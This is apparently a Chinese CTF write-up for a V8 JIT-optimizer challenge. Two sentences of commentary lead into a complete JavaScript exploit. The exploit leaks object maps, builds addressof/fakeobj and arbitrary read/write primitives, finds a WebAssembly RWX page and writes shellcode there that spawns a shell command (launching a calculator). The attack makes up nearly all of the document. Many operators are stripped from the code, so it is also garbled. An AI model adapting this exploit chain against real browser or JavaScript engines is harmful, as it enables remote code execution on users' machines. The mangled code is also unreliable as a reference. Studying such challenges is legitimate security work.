第一次知道原来各种map也是申请的一段连续的内存空间来存储，所以必要的时候可以通过固定偏移来从一种map获取到另一种map。但是要注意这里获取的时候要保证对象不被释放。
这也是做的第一道涉及优化器的题目，收获很多。
class Memory{constructor(){this.buf new ArrayBuffer(8);this.f64 new Float64Array(this.buf);this.u32 new Uint32Array(this.buf);this.bytes new Uint8Array(this.buf);}d2u(val){ //double Uint64this.f64[0] val;let tmp Array.from(this.u32);return tmp[1] * 0x100000000 tmp[0];}u2d(val){ //Uint64 doublelet tmp [];tmp[0] parseInt(val % 0x100000000);tmp[1] parseInt((val - tmp[0]) / 0x100000000);this.u32.set(tmp);return this.f64[0];}
}
function hex(i)
{return i.toString(16).padStart(16, 0);
}
var store[];
var memnew Memory();
function readmap_()
{var map_obj[1.1,2.2,3.3];var map_tmp{x:3};return [map_obj[map_tmp.x],map_obj,map_tmp];
}
function readmap()
{for(let i0;i12000;i)readmap_();return readmap_()[0];
}
var float_mapmem.d2u(readmap());
var obj_mapfloat_map0xa0;
console.log([*] float_map is 0xhex(float_map));
console.log([*] obj_map is 0xhex(obj_map));
var float_mappmem.u2d(float_map);
var obj_mappmem.u2d(obj_map);function fakeobj_(address)
{var arr_1[address,address,address];var tmp_1{x:3};arr_1[tmp_1.x]obj_mapp;return arr_1;
}
function fakeobj(address)
{for(let i0;i12000;i){var tmpfakeobj_(address);}return tmp[0];
}
var float_objfakeobj(float_mapp);
function addressof_(object)
{var arr_2[object,object,object];var tmp_2{x:3};arr_2[tmp_2.x]float_obj;return arr_2;
}
function addressof(object)
{for(let i0;i12000;i){var tmpaddressof_(object);}return tmp[0];
}
var objt{a:1};
var arbfnew ArrayBuffer(0x1234);
var obj{a:mem.u2d(0x5678)};
var fakeArray[float_mapp,mem.u2d(0),mem.u2d(0),mem.u2d(0x100000000000),1.1,2.2
].slice(0);
var fakeArrayaddrmem.d2u(addressof(fakeArray));
fakeArray[2]mem.u2d(fakeArrayaddr);
var victimfakeobj(mem.u2d(fakeArrayaddr0x190));
console.log([*] fakeArrayaddr is hex(fakeArrayaddr));
//console.log([*] victim length is 0xhex(victim.length));
var buf_idx0;
var obj_idx0;
var max_idx0x300;
for(let i0;imax_idx;i)
{let tmem.d2u(victim[i]);if(t0x1234)buf_idxi1;if(t0x5678)obj_idxi;
}
class ArbitraryRW
{addressof(newobj){obj.anewobj;return mem.d2u(victim[obj_idx]);}read64(address){victim[buf_idx]mem.u2d(address);var dtnew DataView(arbf);return mem.d2u(dt.getFloat64(0,true));}
}
var arwnew ArbitraryRW();
var objarray[objt,objt];
var objaddrarw.addressof(objt);
console.log([*] objaddr is 0xhex(objaddr));
console.log([*] buf_idx is 0xhex(buf_idx));
console.log([*] obj_idx is 0xhex(obj_idx));
var wasmCode new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);var wasmModule new WebAssembly.Module(wasmCode);
var wasmInstance new WebAssembly.Instance(wasmModule, {});
let wasmFunc wasmInstance.exports.main;
var inst_addrarw.addressof(wasmInstance);
var rwx_addrarw.read64(inst_addr0x88-1);
console.log([*] inst_addr is 0xhex(inst_addr));
console.log([*] rwx_addr is 0xhex(rwx_addr));//write shellcode to the rwx address
victim[buf_idx]mem.u2d(rwx_addr);
var dtnew DataView(arbf);
const shellcode new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);
for (var i0;ishellcode.length;i) {dt.setUint8(i,shellcode[i], true);
}
wasmFunc();